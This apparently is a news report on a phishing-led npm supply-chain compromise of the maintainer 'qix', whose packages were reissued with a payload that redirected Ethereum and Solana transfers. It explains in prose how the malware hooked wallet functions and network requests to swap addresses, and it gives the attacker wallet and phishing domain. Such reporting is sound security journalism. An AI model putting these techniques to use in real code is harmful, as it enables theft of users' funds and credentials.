Massive npm Attack Targets Ethereum and Solana Wallets, But Only a Few Cents Taken

Key Points:

A phishing email compromised a prominent Node.js developer, injecting harmful code into widely used packages.
Despite the significant scope of the attack, the assailant gained only a fraction of value, while security teams are left with hefty expenses for system updates.
The breach manipulated npm package functionalities to misroute Ethereum and Solana transactions, resulting in negligible financial repercussions.

A phishing email on Monday brought down one of Node.js’s top developers by inserting harmful code into packages that are downloaded billions of times weekly, marking what researchers consider a substantial software supply-chain attack in recent memory.

While the attack’s reach was vast, a report from the Security Alliance released on Tuesday indicates that the attacker escaped with only a few cents. However, the burden of updating backend systems to mitigate future risks now falls to security teams.

The compromised maintainer, known as ‘qix,’ has a reputation for libraries like chalk and debug-js, was contacted last week through an email sent from support@npmjs[.]help, which previously pointed to a Russian server and led to a counterfeit two-factor authentication page on BunnyCDN.

The credential stealer captured usernames, passwords, and 2FA codes before transmitting them to a remote server. With comprehensive access, the attacker reissued all ‘qix’ packages embedded with a crypto-sabotage payload.

Node Package Manager (npm) functions as an app store for developers, allowing them to rely on coding packages from scratch. A maintainer is responsible for creating and updating such packages.

Attack Methodology

The malicious code was elementary, checking if window.ethereum was available and then hooking into critical transaction functions of Ethereum. Requests for approval, permits, transfers, or transferFrom were discreetly directed to a specific wallet: 0xFc4a4858bafef54D1b1d7697bfb5c52F4c166976. Any Ethereum transaction carrying value and lacking data also got misdirected, while in Solana, the malware corrupted transfer recipients with invalid strings starting with “1911…”, completely disallowing transfers.

Network requests were subjected to interception as well. Through hijacking fetch and XMLHttpRequest, the malware scanned JSON responses for strings that resembled wallet addresses and replaced them with one of 280 hardcoded variants to appear deceptively similar.

Consequences of the Attack

Despite the widespread distribution, the outcomes were minimal.

On-chain analysis indicates the attacker received roughly five cents in ether and about $20 in an obscure memecoin, which had a trading volume of less than $600, as detailed in the Security Alliance report.

The widely-used MetaMask browser wallet clarified on X that it wasn’t impacted by the npm supply-chain attack, maintaining locked code versions, employing manual and automated verifications, and rolling out staged updates. Additionally, it utilizes ‘LavaMoat’ to block harmful code inserts and ‘Blockaid’ to flag compromised wallet addresses swiftly to protect against such threats.

Furthermore, Charles Guillemet, CTO of Ledger, warned that malicious scripts had infiltrated packages with over a billion downloads and were specifically engineered to quietly modify wallet addresses during transactions.

This incident follows another warning flagged last week by ReversingLabs regarding npm packages utilizing Ethereum smart contracts to conceal malware uplink, masking command-and-control traffic as routine blockchain requests.